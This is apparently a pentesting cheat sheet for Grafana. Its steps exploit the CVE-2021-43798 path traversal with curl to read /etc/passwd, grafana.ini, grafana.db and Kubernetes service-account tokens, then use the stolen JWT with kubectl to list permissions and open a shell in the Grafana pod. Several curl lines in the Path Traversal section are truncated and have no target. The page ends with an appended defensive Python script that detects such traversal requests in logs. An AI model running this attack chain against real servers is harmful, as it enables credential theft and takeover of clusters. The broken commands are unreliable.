Grafana Pentesting

Last modified: 2023-01-15


Grafana is a multi-platform analytics and interactive visualization web application.

Default Credential


Configuration File

The configuration file (grafana.ini) contains the admin credentials. See the “admin_user” and “admin_password” settings in the file.


Path Traversal

curl --path-as-is -o passwd
curl --path-as-is -o grafana.ini
curl --path-as-is -o grafana.db
curl --path-as-is
curl --path-as-is
curl --path-as-is
curl --path-as-is

Getting a Shell via JWT, Grafana Pod

Some Grafana versions are vulnerable to Path Traversal. Kubernetes creates environment variables for each service in a pod by default.

1. Check Environment Variables on the Target Machine


If you see GRAFANA environment variables like the following, a Grafana service is running in the cluster.


2. Access the Grafana Dashboard

You can access the service at http://<grafana-ip>:<grafana-port>.

3. Get the JWT of the Service Account

Use the Path Traversal vulnerability (CVE-2021-43798).

curl --path-as-is http://<grafana-ip>:<grafana-port>/public/plugins/alertlist/../../../../../../../../etc/passwd

Get the token (JWT) of the service account.

curl --path-as-is http://grafana:3000/public/plugins/alertlist/../../../../../../../../var/run/secrets/

4. Decode the JWT and Get Sensitive Information

See JWT Pentesting.

5. Check the Permissions of This Service Account

Using the JWT, list the permissions the service account has.

kubectl auth can-i --list --token=<Grafana-JWT>

# List pods
kubectl get pods --token=<JWT>

6. Get a Shell on the Grafana Pod

kubectl exec -it <grafana-pod-name> --token=<Grafana-JWT> -- /bin/bash
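As an added defensive example (not part of the original page): a small detector that flags the CVE-2021-43798 traversal pattern used in step 3 in HTTP access-log lines, by decoding and normalizing the request path the way the file server would and checking whether it still resolves inside its plugin directory. The log line format and the path= field are assumed; the sample lines are constructed.

```python
import posixpath
import re
from urllib.parse import unquote

# Grafana serves plugin assets under /public/plugins/<plugin-id>/...;
# CVE-2021-43798 is a traversal out of that directory.
PLUGIN_ASSET = re.compile(r"^/public/plugins/(?P<plugin>[^/]+)/")
PATH_FIELD = re.compile(r"\bpath=(?P<path>\S+)")

# Constructed sample access-log lines (field layout assumed, not Grafana's exact format).
SAMPLE_LOGS = [
    "t=2023-01-15T10:00:01Z method=GET path=/public/plugins/alertlist/module.js status=200",
    "t=2023-01-15T10:00:02Z method=GET path=/public/plugins/alertlist/img/../module.js status=200",
    "t=2023-01-15T10:00:03Z method=GET path=/public/plugins/alertlist/../../../../../../../../etc/passwd status=200",
    "t=2023-01-15T10:00:04Z method=GET path=/public/plugins/alertlist/..%2F..%2F..%2F..%2Fvar/run/secrets/ status=200",
    "t=2023-01-15T10:00:05Z method=GET path=/api/dashboards/home status=200",
]


def resolve_plugin_path(raw_path: str):
    """Return (plugin_id, normalized_path) for a plugin-asset request, else None.

    The path is percent-decoded twice so encoded and double-encoded '..'
    segments are visible, then normalized like a file server would resolve it.
    """
    decoded = unquote(unquote(raw_path.split("?", 1)[0]))
    m = PLUGIN_ASSET.match(decoded)
    if m is None:
        return None
    return m.group("plugin"), posixpath.normpath(decoded)


def is_traversal(raw_path: str) -> bool:
    """True when a plugin-asset request resolves outside its own plugin directory."""
    resolved = resolve_plugin_path(raw_path)
    if resolved is None:
        return False
    plugin, normalized = resolved
    base = f"/public/plugins/{plugin}"
    # A benign 'img/../module.js' stays under base; a real traversal leaves it.
    return not (normalized == base or normalized.startswith(base + "/"))


def find_traversal_attempts(log_lines):
    """Return [(line, normalized_target)] for lines whose path escapes the plugin dir."""
    hits = []
    for line in log_lines:
        m = PATH_FIELD.search(line)
        if m and is_traversal(m.group("path")):
            hits.append((line, resolve_plugin_path(m.group("path"))[1]))
    return hits


if __name__ == "__main__":
    for line, target in find_traversal_attempts(SAMPLE_LOGS):
        print(f"traversal -> {target}: {line}")
```

Run it over the constructed samples and only the two traversal lines are reported, resolved to /etc/passwd and /var/run/secrets; the benign '..' inside the plugin directory is not flagged.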